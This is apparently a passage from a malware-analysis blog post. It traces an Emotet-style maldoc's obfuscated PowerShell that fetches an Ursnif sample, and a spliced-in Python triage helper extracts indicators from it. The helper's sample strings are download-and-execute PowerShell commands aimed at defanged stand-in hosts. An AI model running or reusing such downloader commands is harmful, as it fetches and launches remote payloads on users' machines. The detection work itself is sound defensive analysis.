It’s got a pile of VBA inside too!
Hmm. Okay, this looks familiar. The AutoOpen() block is a tiny bit different, using Shell% instead, but it’s pretty close to the same thing at the end of the day. Let’s see what that string evaluates to.
Again with the DOSfuscation! That stuff unpacks to running:
Well. Look at that. The same script we saw earlier, more or less.
It’s taking a list of URLs in $Apq and downloading them as “150.exe” and running them…
There’s only one url in the url list, but it’s splitting the URL list on “@”?
Why would you do that?
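The “@”-delimited URL list is itself a useful triage signal: even when only one URL is present, the `.Split('@')` idiom plus a fixed drop name and a process launch is the shape to key on. The helper below is an added example, written for this post rather than taken from it or from any tool the post describes. It pulls the URL-list variable, the individual URLs (however many the list carries), the drop filename and whether an execution primitive follows, from an already-deobfuscated PowerShell string. The two sample scripts are constructed stand-ins with defanged URLs, not the real command line from the document; the variable name `$Apq` and the drop name `150.exe` are borrowed from the post, everything else is assumed.

```python
import re
from typing import Optional

# Constructed sample in the shape the post describes: a URL list in $Apq, split on "@",
# each entry downloaded to 150.exe and started. Defanged and hypothetical.
SAMPLE_ONE_URL = (
    "$Apq='hxxp://example.invalid/wp-content/x.php'.Split('@');"
    "foreach($u in $Apq){try{(New-Object Net.WebClient).DownloadFile($u,'150.exe');"
    "Start-Process '150.exe';break}catch{}}"
)

# Constructed variant with two URLs, to show the "@" split actually doing something.
SAMPLE_TWO_URLS = (
    "$Apq='hxxp://a.invalid/1.php@hxxp://b.invalid/2.php'.Split('@');"
    "foreach($u in $Apq){try{(New-Object Net.WebClient).DownloadFile($u,'150.exe');"
    "Invoke-Item '150.exe';break}catch{}}"
)

# $Name='...'.Split('@')  -> captures the variable name and the raw list literal
URL_LIST_RE = re.compile(r"\$(\w+)\s*=\s*'([^']*)'\s*\.Split\(\s*'@'\s*\)", re.IGNORECASE)
# DownloadFile(<expr>, '<name>.exe') -> captures the on-disk drop name
DROP_NAME_RE = re.compile(r"DownloadFile\([^,]+,\s*'([^']+\.exe)'", re.IGNORECASE)
# Common PowerShell execution primitives that follow the download
EXEC_RE = re.compile(r"(Start-Process|Invoke-Item|Invoke-Expression|\bIEX\b)", re.IGNORECASE)


def triage_downloader(script: str) -> Optional[dict]:
    """Return IoC-style fields for a split-on-'@' downloader, or None if the
    pattern is absent. Input is deobfuscated PowerShell text."""
    m = URL_LIST_RE.search(script)
    if not m:
        return None
    var, raw = m.groups()
    urls = [u for u in raw.split("@") if u]  # empty entries from stray "@" are dropped
    drop = DROP_NAME_RE.search(script)
    return {
        "variable": var,
        "urls": urls,
        "url_count": len(urls),
        "drop_name": drop.group(1) if drop else None,
        "executes": bool(EXEC_RE.search(script)),
    }


if __name__ == "__main__":
    for s in (SAMPLE_ONE_URL, SAMPLE_TWO_URLS, "Write-Host 'benign'"):
        print(triage_downloader(s))
```

Because the regexes match the idiom rather than any specific host, the same helper works for the single-URL case in this document and for the multi-URL lists seen in Emotet’s usual campaigns; the extracted `urls` list is what you would feed into blocklists or retro-hunting, and `executes` plus `drop_name` give you the host-side artefacts to look for.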
Clearly someone here has used the same tool as before to push a malware download URL, but what’s on the other end of this URL?
It turns out this is an Ursnif sample. Which is weird and cool, because it’s being delivered in something that might as well be an Emotet maldoc.
I wonder how that happened. No, really, I wonder how that happened. You see, we’ve observed a few things with Emotet.
We know that they mostly drop their own banking malware from their URL quintets, but occasionally they will load up their own spam tools to send their maldocs out, and sometimes they will even distribute PandaBanker or the TrickBot trojan instead.
We’ve seen prior “versions” of Emotet manifesting as two parallel sets of distribution infrastructure, originally distributing different malware. This has recently morphed into a single infrastructure that generally distributes only one kind of thing at a time, although it has occasionally been observed distributing different download URLs in parallel during the same time window, which suggests a capability to run multiple campaigns contemporaneously.
Clearly, this Ursnif sample isn’t being served from the Emotet group’s distribution infrastructure, but it’s very interesting nonetheless. Did a third party write the tool that creates the maldoc from a template and contains the payload URLs and both of these groups obtained it? Did the Emotet group write that tool for their own purposes, and then they sold it to the Ursnif group (or the Ursnif group obtained it through some means)? Was this a test run for a campaign by the Emotet group to embed a link to the Ursnif group’s payload infrastructure in their own spam email delivery?
We can’t really know, but it’s something to watch for.